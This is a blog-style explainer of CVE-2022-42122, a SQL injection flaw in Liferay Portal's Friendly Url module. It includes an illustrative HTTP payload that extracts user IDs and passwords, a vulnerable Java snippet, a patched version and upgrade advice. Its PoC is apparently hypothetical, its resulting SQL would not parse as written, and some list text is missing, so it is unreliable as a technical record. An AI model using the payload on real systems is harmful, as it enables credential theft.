CVE-2022-42122 - SQL Injection in Liferay Portal’s Friendly Url Module Explained

CVE-2022-42122 is a serious SQL injection vulnerability found in the Friendly Url module of Liferay Portal 7.3.7 and Liferay DXP (fix pack 2 through update 4). This flaw lets attackers run arbitrary SQL commands on the backend simply by sending a special payload into the title field of a friendly URL. In this post, I'll break it down in plain language, show a sample exploit, and explain how to secure your installation.

What is Liferay Portal?

Liferay Portal is a popular open-source portal framework used by organizations for building web portals, intranet sites, and digital experience platforms (DXP). Like all web software, it processes a lot of user input—including URLs for pages and resources.

What’s Wrong in the Friendly Url Module?

The "Friendly Url" module handles clean, user-friendly URLs for portal pages. In versions 7.3.7 (and DXP 7.3 fix pack 2 through update 4), this feature has a SQL injection vulnerability: The value in the title field of the URL isn't properly filtered before being placed inside a SQL query. That means any malicious input sent by users can break out of the intended query, letting attackers run their own database commands.

References

- NVD - CVE-2022-42122
- Original Liferay advisory
- Friendly URL Vulnerability Report

Here’s a simplified explanation.

Suppose you have a page Friendly URL /home. Liferay stores info about this URL in its database, usually updating it when you rename a page or add translations. If an attacker crafts a payload that escapes the SQL context and adds their own command, they can do things like:

Proof-of-Concept Exploit

Let’s look at a code snippet that shows how this SQL injection could be triggered. Suppose a vulnerable endpoint receives the new title from a POST or GET request:

POST /o/friendly-url/mapping HTTP/1.1
Host: liferay.local
Content-Type: application/json

{
  "title": "test-title'); SELECT userId, password FROM User_ WHERE ('1'='1"
}

On the backend, imagine the (vulnerable) Java code builds the SQL like this

// Bad practice: direct string concatenation!
String sql = "UPDATE FriendlyURL SET title = '" + title + "' WHERE id = " + id;
statement.execute(sql);

If title is set to:  
test-title'); SELECT userId, password FROM User_ WHERE ('1'='1

Then the constructed SQL query turns into a disaster

UPDATE FriendlyURL SET title = 'test-title'); SELECT userId, password FROM User_ WHERE ('1'='1' WHERE id = 123

Here, the injected SELECT statement will be executed as a separate command. The attacker can steal user account information, potentially even admin credentials.

Delete important data, causing downtime

This is remote — the attacker just needs to send HTTP requests. There’s no need for prior access!

If you run a vulnerable version

- Upgrade to the latest release or at least to 7.3.7 GA8/DXP 7.3 update 5

Example of Safe Java Code

String query = "UPDATE FriendlyURL SET title = ? WHERE id = ?";
PreparedStatement pstmt = connection.prepareStatement(query);
pstmt.setString(1, title); // Safe, parameterized
pstmt.setInt(2, id);
pstmt.executeUpdate();

Final Thoughts

SQL injection is one of the oldest and most dangerous web vulnerabilities. The case of CVE-2022-42122 in Liferay Portal's Friendly Url module is a strong reminder: never trust user input in your code, always use safe query methods, and keep up with security updates.

Further reading

- OWASP SQL Injection Cheat Sheet
- Liferay Portal Downloads
- CVE-2022-42122 on MITRE

If you’re a sysadmin or developer working with Liferay, review your system today. This could save your organization from a damaging breach.

Stay safe online!

*Written exclusively for you by our security team. You may share this post but do not copy its content elsewhere without permission.*

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 11/17/2022 15:00:00 UTC